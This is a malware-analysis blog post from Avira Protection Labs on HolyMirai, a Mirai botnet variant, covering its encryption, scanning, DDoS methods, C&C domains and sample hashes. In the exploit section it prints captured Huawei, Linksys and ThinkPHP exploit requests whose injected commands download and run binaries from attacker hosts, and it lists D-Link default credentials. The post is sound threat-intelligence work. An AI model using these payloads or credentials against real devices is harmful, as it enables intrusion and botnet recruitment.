The evolution of Mirai into HolyMirai

Avira Protection Labs, 8 months ago 6 min read

By October 2016, the Mirai botnet had infected over 500,000 IoT devices. The massive distributed denial of service (DDoS) attack on the dynamic DNS service Dyn, and several  high-profile services including Krebs on Security,  generated more than 1Tbps of traffic. For many in the world, internet services were temporarily disrupted.

This remarkable attack was carried out via unsecured, innocuous Internet-of-Things (IoT) devices like home routers, air-quality monitors, and personal surveillance cameras. And the IoT industry learnt a lesson; a lesson that it has yet to apply in practice.

Mirai botnets remain active today. However, the code has evolved into a new form, one that Avira researchers have named HolyMirai.

This blog will present a study of the core similarities, differences, and evolution of the original Mirai and its new variant, HolyMirai. A follow up blog will describe another evolution of HolyMirai along with new C&C servers.

Introduction

Avira develops threat intelligence for many applications. The Avira Protection Labs uses many techniques to develop this intelligence, not all of which are public. However, one method is honeypots, and one of these targets IoT binaries.

The Avira Protection Labs IoT honeypot captures and identifies many new and unique forms of malware each day. The vast majority are modified variants of the original Mirai. This should not be surprising given how popular Mirai became after the leak of its source code, just a year after the original attack.

Among the recently captured pieces of malware, which are all part of active botnets, we found seven samples all containing a flashy string “compiled using cia holyc compiler” – a tongue-in-cheek reference to HolyC programming language and its author Terry A. Davis.

We wrote Yara rules to hunt similar samples that contained the same string, on VT and found 36 more variants. Considering the author’s sense of humor, we decided to name it HolyMirai.

Evolution – Core findings/differences with the original Mirai

  1. Custom Encryption Method(Same as MiraiCrush)
  2. Aggressive Scanning
  3. Additional DDoS techniques
  4. Adopting different exploits for targeted devices or lateral movement

As shown in the versions table below the authors forgot to strip two samples with the SHA hashes of

c25795c790a33c06ce48780a271db87035a4ad3a957766c7667a82758afecfde

and

cd2bd1f6387a9c01d58765e40cf69b37d5dad28e6fa5af01dde39a045dd4af08 

before releasing them into the wild. As a result, they both came with debugging information which makes reverse engineering much easier. We selected these two samples as our primary target, though also considered other samples, especially where they differed from their parent version and where they are customized.

After looking into the samples, of HolyMirai, we observed some significant similarities with the original Mirai code and Hakai malware though with notable customized features and improvements.

General Analysis

In this section, we explain the common features shared with all samples in our analysis set.

What is the deal with the flashy string?

As mentioned before, all samples contain a flashy string “compiled using cia holyc compiler“.  This string is used as a parameter in “inet_addr” to create a fake IP address for the C&C Server, the intent to mislead malware analysts.

 

As useless as it seemed, it was still a good hanger with which to classify the malware and hunt other variants.

Encryption method:

Although the encryption method seen in these samples are different to the original Mirai’s, it is the same routine previously observed in MiraiCrush. The only difference is the encryption key which is 0xDEADDAAD instead of  0xDEDEFFBA used by MiraiCrush.

Aggressive Scanning:

Below is the screenshot of the original Mirai source code. As shown in the last line, one instance of the scanner is initiated when malware is executed.

However, as shown in the screenshot below, HolyMirai instantiates multiple scanners (in this case 4 instances), making the scanning process much faster and more aggressive, eventually leading to the wider spread of the botnet.

Additional DDoS techniques:

Aside from the Mirai attack methods that exist in HolyMirai, there are additional DDoS methods including:

  1. Christmas tree attack
  2. TCP URG SYN attack
  3. TCP ACK SYN attack
  4. TCP ALL attack (All TCP flags are set)
  5. Two random UDP attacks (the first version creates a string of length 1 to 31 and the second version creates a random string of length 100 to 800 characters)First version:

    Second version:

Exploits

HolyMirai has evolved over time. In this section, we will present some unique exploits that we found in individual samples of HolyMirai which are not present in the earlier versions.

CVE-2017-17215 – Huawei Home Device Upgrade exploit

Found in the sample with  SHA256 hash of d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e, this exploit target Huawei home routers. This was also present in MiraiCrush

Huawei Exploit

POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username=”dslf-config”, realm=”HuaweiHomeGateway”, nonce=”88645cefb1f9ede0e336e3569d75ee30″, uri=”/ctrlt/DeviceUpgrade_1″, response=”3612f843a42db38f48f59d2a3597e19c”, algorithm=”MD5″, qop=”auth”, nc=00000001, cnonce=”248d1a2560100669″

<?xml version=”1.0″ ?><s:Envelope xmlns:s=”http://schemas.xmlsoap.org/soap/envelope/” s:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”><s:Body><u:Upgrade xmlns:u=”urn:schemas-upnp-org:service:WANPPPConnection:1″><NewStatusURL>$(/bin/busybox wget -g cnc.arm7plz.xyz -l /tmp/ggy -r /nbm; /bin/busybox chmod 777 * /tmp/ggy; /tmp/ggy huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

note the payload:

/bin/busybox wget -g cnc.arm7plz.xyz -l /tmp/ggy -r /nbm;

/bin/busybox chmod 777 * /tmp/ggy;

/tmp/ggy huawei

Linksys the “Moon” worm exploit

Found in the sample with  SHA256 hash of d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e, This exploit target the linksys modems and it is first seen in the “Moon” worm.

Linksys Exploit

POST /tmUnblock.cgi HTTP/1.1
Host: 192.168.0.14:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.20.0
Content-Length: 227
Content-Type: application/x-www-form-urlencoded

ttcp_ip=-h+%60cd+%2Ftmp%3B+rm+-rf+set.mpsl%3B+wget+http%3A%2F%2Fcnc.arm7plz.xyz%2Fbins%2Fset.mpsl%3B+chmod+777+set.mpsl%3B+.%2Fset.mpsl+linksys%60&action=&ttcp_num=2&ttcp_size=2&submit_button=&change_action=&commit=0&StartEPI=1..

note the payload:

cd /tmp;

rm -rf set.mpsl;

wget http://cnc.arm7plz.xyz/bins/set.mpsl;

chmod 777 set.mpsl;

./set.mpsl linksys

ThinkPHP 5.x RCE exploit

Found in the sample with  SHA256 hash of 3a49d1fdd9f19b8031a6c07ea8c8ffa92b2563864729a4cc8ec68f5a9f96d999, This exploits a flaw in ThinkPHP application.

ThinkPHP Exploit

GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://cnc.junoland.xyz/bins/egg.x86;cat%20egg.x86%20>%20lzrd;chmod%20777%20lzrd;./lzrd%20thinkphp.x86 HTTP/1.1
Host: 127.0.0.1
User-Agent: Sefa
Accept: */*
Accept-Language: en-US,en;q=0.8
Connection: Keep-Alive

note the payload:

cd /tmp;

wget http://cnc.junoland.xyz/bins/egg.x86;

cat egg.x86 > lzrd;

chmod 777 lzrd;

./lzrd thinkphp.x86

Targeted devices

In this section we present targeted attacks against specific vendors and devices

  1. Huawei (exploit shown above)
  2. Linksys (exploit shown above)
  3. D-Link (exploit shown below)

Targeting D-Link:

Scanner module of the HolyMirai with the SHA256 hash of 153964ee69c1a5e8aa16eb454778baf2f3190ee539b05ca798710b1642cfc90a contains D-link default passwords, which is not present in the original Mirai source code.

D-Link Default username & passwords

Alphanetworks wrgg19_c_dlwbr_dir300
Alphanetworks wrgn49_dlob_dir600b
Alphanetworks wrgn23_dlwbr_dir600b
Alphanetworks wrgn22_dlwbr_dir615
Alphanetworks wrgnd08_dlob_dir815
Alphanetworks wrgg15_di524
Alphanetworks wrgn39_dlobhans_dir645
Alphanetworks wapnd03cm_dkbs_dap2555
Alphanetworks wapnd04cm_dkbs_dap3525
Alphanetworks wapnd15_dlob_dap1522b
Alphanetworks wrgac01_dlob.hans_dir865
Alphanetworks wrgn23_dlwbr_dir300b
Alphanetworks wrgn28_dlob_dir412
Alphanetworks wrgn39_dlob.hans_dir645_V1

Additional info

List of different HolyMirai variants:

Sample hash (Sha256) Source Executable Format Target Architecture Debugging Info C&C ServerS
0b109c4655284364e7f6d4cf53cbd483e06a3a8142a8be2968c1bf28229a04be Honeypot ELF 32-bit LSB executable ARM stripped netflux.r00ts.online
hulo.r00ts.online
1f4f47311e452bdffaf04fc64e5a6ea0c88ac04623c17faeed36ffe766b2511c Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
3b1599b7731bea8ec4c7f7297e0965439cb0e4c54643ca1441cd4678fab22d82 Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
4264a1d53c6c762722d633a74a7da85a0778f505704faf2e770c9a9e280dc284 Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
5dfed66ede83181c3eaac50f85947c4cb9995260d11c63bb049475371055001d Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
9342952ff6e71890989413bf4de1e650b39e828a36af9e3d2e3f20a0cf137d78 Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
f15262656758111846bdf4979618ea71038598c16c71b1203608a2c85e9d5fce Honeypot ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
0395fa502eb566fcf6e4876c6fcbdd7f9fe043c625dcf41635a8b1501e7461c6 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.r00ts.online
hulo.r00ts.online
12676fda6b43c86befe47cf69ea4455e7849d660f8325c354480af22a140c5bb VirusTotal ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
153964ee69c1a5e8aa16eb454778baf2f3190ee539b05ca798710b1642cfc90a VirusTotal ELF 32-bit MSB executable MIPS stripped netflux.r00ts.online
hulo.r00ts.online
1bf7448da897a1d7774d24f6297b77c6322c9fda15224a44b1290729eac61982 VirusTotal ELF 32-bit LSB executable ARM stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
2397b846ac2aa7265990d4e792c236c94bdd8bd4ba3e2ce16b4135839a2870f5 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
2caef91f7bc4491fe5699eb7c74b689bdfd885f821872e2de6ce9df84e70d3fb VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.r00ts.online
hulo.r00ts.online
2ccfd60051294abccfb5aff42588126bee6a893991150cdbfe3e357ba319acc9 VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped cnc.arm7plz.xyz
scan.arm7plz.xyz
30b2167a0f1943c1315c7dd14698259d00b8d3fb18647a8cb03341d5190fda51 VirusTotal ELF 32-bit MSB executable Motorola m68k stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
378f6d836a202b32ca8795f7dc4c24dffb7f232bad5554b045b9b9e82034443e VirusTotal ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
3a49d1fdd9f19b8031a6c07ea8c8ffa92b2563864729a4cc8ec68f5a9f96d999 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped cnc.junoland.xyz
scan.junoland.xyz
48aabb4ac83cebe9aec6af359a2e10af0ed112fc3936f8c4149a3838e6dfc426 VirusTotal ELF 32-bit MSB executable MIPS stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
575a28ca439411a40d8cf0f381c6f0c1889a8a08627d2135ff28b9dfd8e2dc6c VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.r00ts.online
hulo.r00ts.online
6a651d67be24382c9328b6de7829dc861a6958ff38e4260abb35e16b8f60666a VirusTotal ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
6e533d390048e1bb3157c0aa6a429195698515cf2bcd99fb2276d202a2e6c2c4 VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
6f8026820c63c92e610de15e771e8d00826bd5050a3c4b06210e23f6fc68868b VirusTotal ELF 32-bit LSB executable ARM stripped netflux.r00ts.online
hulo.r00ts.online
7854e35610ead6f1010ccd1858c6b6ecb19c34c149c6326c10e7016202767711 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
8851b330a6bf5d2efade40a0262553e2a57bc3d3416f4f29f9f7bd1e5634edcb VirusTotal ELF 32-bit MSB executable SPARC stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
8ca2c4c8236f159d55ee2160ed20bc69b51f93990898e6ecfea506ff3cdeca4a VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
8ca3f4dd7ad0d01f3cd6a34fa060af33c3c840ccf6f368f294f0e50f380ec52f VirusTotal ELF 32-bit LSB executable MIPS stripped cnc.arm7plz.xyz
scan.arm7plz.xyz
93b75a6f4d1e6880d1dd08de14137a1685be0cf70dae05b89f74d3c83820a7ef VirusTotal ELF 32-bit LSB executable Intel 80386 stripped cnc.arm7plz.xyz
scan.arm7plz.xyz
9b45260b5b5157a70dd7d8835b88b503f091f4ca1b64d7518843f41e14f986d7 VirusTotal ELF 32-bit MSB executable MIPS stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
9bf2754afc362510ece8cfaa6062c70e4aee001ab2fd011f7a01dc35399db495 VirusTotal ELF 32-bit LSB executable ARM stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
a07d2c5c94a8048205cd24cff34195e3eed1534044772386b7b94a9e84f8ea2c VirusTotal ELF 32-bit LSB executable ARM stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz
aa4caeb4f22998fdb7bb5a77e6cb75f9ddc5f598902c5f4f26842d060af08a37 VirusTotal ELF 32-bit LSB executable ARM stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
aede29b4914344f00998d2e3183d005bee886a81f0e430536cf0a842ecdde4bd VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped netflux.r00ts.online
hulo.r00ts.online
b37d62fb74bf89921dbbdcea8bb8f5a85bc4b2bbf002146c651921bdbf96e745 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
c25795c790a33c06ce48780a271db87035a4ad3a957766c7667a82758afecfde VirusTotal ELF 32-bit LSB executable ARM with debug_info netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
ca957197780b9e40d550828024377888130735c31815716106b0be65b80c51f1 VirusTotal ELF 32-bit LSB executable MIPS stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
cd2bd1f6387a9c01d58765e40cf69b37d5dad28e6fa5af01dde39a045dd4af08 VirusTotal ELF 32-bit LSB executable ARM with debug_info drum.aydenjonza.xyz
storage.aydenjonza.xyz
d6cf67dea7f89d87636f80eba76d4bfcdd6a5fc6540967c446c33522e95f156e VirusTotal ELF 32-bit MSB executable PowerPC or cisco 4500 stripped cnc.arm7plz.xyz
scan.arm7plz.xyz
dc65a17134774b13b898af7af3197fdab765de8770d92fdf2967dc9d382b0a08 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.r00ts.online
hulo.r00ts.online
e226bc964e31fb835ea2ae5fcd697d16a6e693557bf46bda43d0bf71f151d6c1 VirusTotal ELF 32-bit LSB executable MIPS stripped netflux.r00ts.online
hulo.r00ts.online
e25521b6d5c974a8844d55a7f67b9ad6fc15129a7d6988695c01f25da06e9308 VirusTotal ELF 32-bit LSB executable Intel 80386 stripped cnc.junoland.xyz
scan.junoland.xyz
e7f8389e88e6d336666ca9572829e88fddcdd2ceb532a305effaaff8514769cd VirusTotal ELF 32-bit LSB executable Intel 80386 stripped netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
e9dfa336a668c6d33352860d9443062446af41239edb0c6a9ec49213a6713534 VirusTotal ELF 32-bit LSB executable MIPS stripped drum.aydenjonza.xyz
storage.aydenjonza.xyz

 

List of C&C servers 

C&C Servers (all versions included)

netflux.r00ts.online
hulo.r00ts.online
netflux.flexsecurity.xyz
hulo.flexsecurity.xyz
drum.aydenjonza.xyz
storage.aydenjonza.xyz
cnc.arm7plz.xyz
scan.arm7plz.xyz
cnc.junoland.xyz
scan.junoland.xyz

Ghidra script to decrypt strings:

# This script helps to extract and decrypt strings in HolyMirai
#@author Hamidreza Ebtehaj
#@category _NEW_
#@keybinding
#@menupath Tools.Misc.MiraiString
#@toolbar

number_of_hits = 100
xor_key = 0x4
start = currentAddress
separators = list(findBytes(currentAddress, “\\x04\\x00”, number_of_hits, 1))
separators += list(findBytes(currentAddress, “\\x00\\x00″, number_of_hits, 1))
separators.sort()

num = 1
for off in separators:
if start >= off:
continue
# Decrypting strings
bts = getBytes(start, off.subtract(start))
for i in range(len(bts)):
bts[i] ^= xor_key
hex_str = ” “.join([“%02X” % x for x in bts])
str = “”.join([“%c” % x for x in bts if x < 0x80 and x > 0x1f])
# print (“%02x %s : %s %s” % (num, start, str , hex_str))
print (“%s” % str)
# Getting next address
start = off
while getByte(start) == 4 or getByte(start) == 0:
start = start.next()
num += 1

 

Want to comment on this post?

We encourage you to share your thoughts on your favorite social platform.
The evolution of Mirai into HolyMirai

Avira Protection Labs

Protection Lab is the heart of Avira’s threat detection and protection unit. The researchers at work in the Labs are some of the most qualified and skilled anti-malware researchers in the security industry. They conduct highly advance research to provide the best detection and protection to nearly a billion people world-wide.

You might like

Research

Capesand. The revival of exploit kits.

Capesand. The revival of exploit kits.

In this blog we are taking a brief look at the background of exploit kits, but mainly focusing on reversing NJcrypt which is a loader for njRAT.

8 months ago 7 min read
Expert Perspectives

Vulnerability update – May 2020

Vulnerability update – May 2020

In this report we will take a look at some of the more interesting vulnerabilities of early 2020.

4 months ago 3 min read